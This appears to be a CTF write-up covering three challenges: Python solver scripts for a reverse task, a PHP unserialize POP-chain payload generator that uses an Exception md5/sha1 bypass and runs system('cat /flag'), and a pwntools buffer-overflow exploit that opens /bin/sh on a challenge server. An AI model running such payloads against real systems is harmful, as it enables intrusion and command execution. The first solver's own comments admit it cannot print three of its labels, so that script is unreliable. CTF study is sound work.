RE: ser_leak
题目是原题 (the challenge reuses a previously published problem, so the known solver below applies unchanged).
x1-x5 (recovered by the first script below: the smallest i in the scanned range whose popcount is odd and whose integer square root equals the target value):
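def func2(x):
    """Return the number of set bits (popcount) of the non-negative integer x.

    Equivalent to the original recursive "sum of binary digits" form, but
    iterative: it does not consume recursion depth for large x, and it
    refuses negative input instead of recursing forever (for x < 0,
    x // 2 never reaches 0 in Python's floor division).

    Raises:
        ValueError: if x is negative.
    """
    if x < 0:
        raise ValueError("func2 expects a non-negative integer")
    # bin(x) is "0b..." for x >= 0, so counting '1' characters is the popcount.
    return bin(x).count("1")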
def func3(x):
    """Parity of x: 1 when x is odd, 0 when even (same as x % 2)."""
    _, remainder = divmod(x, 2)
    return remainder
def func1(N, L, R):
    """Binary search on the inclusive range [L, R] for the largest integer
    whose square does not exceed N.

    The range is halved until one candidate remains; the upper half is kept
    whenever mid*mid <= N, so the result is floor(sqrt(N)) as long as that
    value lies inside [L, R]. Iterative form of the original recursion;
    the parameter names are part of the call interface and are unchanged.
    """
    lo, hi = L, R
    while lo != hi:
        mid = (lo + hi + 1) // 2
        if mid * mid > N:
            hi = mid - 1
        else:
            lo = mid
    return lo
def _func1(x):
    """Integer square root of x (x >= 1), searched by func1 over [1, x]."""
    lower_bound = 1
    return func1(x, lower_bound, x)
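if __name__ == '__main__':
    # For each target k, print "<label>: i" for the smallest i in
    # [10_000_000, 100_000_000) whose popcount is odd and whose integer
    # square root is k. Output is identical to the original flag-based
    # version, but _func1(i) is computed once per i instead of four times,
    # and the scan stops as soon as every target has been reported.
    # NOTE(review): k can only match i in [k*k, (k+1)*(k+1)); 963, 1999 and
    # 3141 all square to less than 10_000_000, so those labels can never be
    # printed by this scan as written (same as in the original loop).
    targets = {963: "x1", 4396: "x2", 6666: "x3", 1999: "x4", 3141: "x5"}
    for i in range(10000000, 100000000):
        if func3(func2(i)) != 1:
            continue
        # pop() guarantees each label is printed at most once.
        label = targets.pop(_func1(i), None)
        if label is not None:
            print(label + ":", i)
        if not targets:
            break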
x6 (computed by the second script below):
def nextm(n, m):
    """Advance the trial divisor: m + 1 while m*m <= n, otherwise 0 (stop marker)."""
    return m + 1 if m * m <= n else 0
def nextn(n, m):
    """Return n unchanged when m does not divide n, else 0 (n marked composite).

    Raises ZeroDivisionError for m == 0, exactly like the original expression.
    """
    divisible = n % m == 0
    return 0 if divisible else n
def test(n, m):
    """Trial-division primality driver.

    Returns 0 once n has been zeroed by nextn (a divisor m was found) and 1
    once nextm has reset the divisor to 0 (m*m exceeded n without a hit).
    Each step computes the next (n, m) pair from the *same* current pair,
    exactly as the recursive original did; iteration replaces recursion.
    """
    while True:
        if n == 0:
            return 0
        if m == 0:
            return 1
        n, m = nextn(n, m), nextm(n, m)
def func4(x):
    """Return 1 if x is prime, else 0; 1 and 2 are answered directly,
    every other x is handed to test() starting from divisor 2."""
    special_cases = {1: 0, 2: 1}
    if x in special_cases:
        return special_cases[x]
    return test(x, 2)
if __name__ == '__main__':
    # Count how many of the odd numbers 1, 3, 5, 7 func4 reports as prime.
    odd_numbers = (2 * k - 1 for k in range(1, 5))
    x6 = sum(1 for value in odd_numbers if func4(value) == 1)
    print(x6)
WEB: 杰克与肉丝 (Jack and Rose)
考点 (key points):
1、php反序列化pop链构造 — building a PHP unserialize() POP (property-oriented programming) chain
2、Exception类绕过md5、sha1 — two Exception objects constructed on the same line with the same message are distinct objects (different `code`) yet produce the same string when cast, so md5()/sha1() of them compare equal
参考 (reference)
https://blog.csdn.net/LYJ20010728/article/details/114493052
代码 (payload generator; the target's unserialize side is not reproduced here):
<?php
class Titanic{
// Root object of the serialized payload. It only wires the two gadgets
// together; the target code that unserializes it and reaches Jack/Love is
// not part of this page, so the trigger path is not documented here.
public $people;
public $ship;
function __construct(){
$this->people = new Jack();
$this->ship = new Love();
}
}
class Jack{
// Never assigned in this generator. Being private, it serializes under a
// key wrapped in NUL bytes ("\0Jack\0action"), which is why the output
// below is urlencode()d rather than printed raw.
private $action;
// __set runs when an inaccessible/undeclared property is written on a
// Jack instance: it calls method $a on the assigned value $b. Nothing
// here triggers it — it is a gadget for the receiving side.
function __set($a, $b)
{
$b->$a();
}
}
class Love {
// Link in the chain: holds the Rose object that carries the Exception pair.
public $var;
function __construct(){
$this->var = new Rose();
}
}
class Rose {
public $var1,$var2;
public function __construct(){
// Message carrying the command to execute on the target.
$cmd ='system("cat /flag");?>';
// Both Exception objects are created on the same source line with the same
// message, so their string form (message, file, line) is identical while
// the differing code argument keeps them distinct objects — this is the
// md5/sha1 comparison bypass the write-up refers to.
$a = new Exception($cmd);$b = new Exception($cmd,1);
$this->var1 = $a;
$this->var2 = $b;
}
}
// Build the chain and print it URL-encoded: the private Jack::$action
// property serializes with NUL bytes, which would not survive a raw paste.
echo urlencode(serialize(new Titanic()));
PWN: cover
把那个地址写在buf里面溢出到v5的位置 fastcall函数调用, 执行/bin/sh. (Write the target address into buf so the overflow lands on v5; the callee uses the fastcall convention, and the final input "/bin/sh" is the command it ends up running.)
exp如下 (exploit):
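from pwn import *

# Exploit for the "cover" binary: overflow buf so the stack slot for v5 is
# overwritten with the target address, then hand the program "/bin/sh".
# Fixes over the original listing: curly quotes (a SyntaxError) replaced by
# ASCII quotes, the stray leading space removed from the host string, and
# `p` is actually created — run locally by default, or `python exp.py REMOTE`
# to use the challenge server.
context.log_level = 'debug'
if args.REMOTE:
    p = remote("118.190.62.234", 12435)
else:
    p = process("./pwn")
p.recv()
# 0x80484D2 is the address the write-up says to place in buf; the trailing
# 0x24 byte is kept verbatim from the original payload (its role is not
# explained in the write-up).
p.send(p32(0x80484D2) + b'\x24')
p.recv()
p.send(b'/bin/sh')
p.interactive()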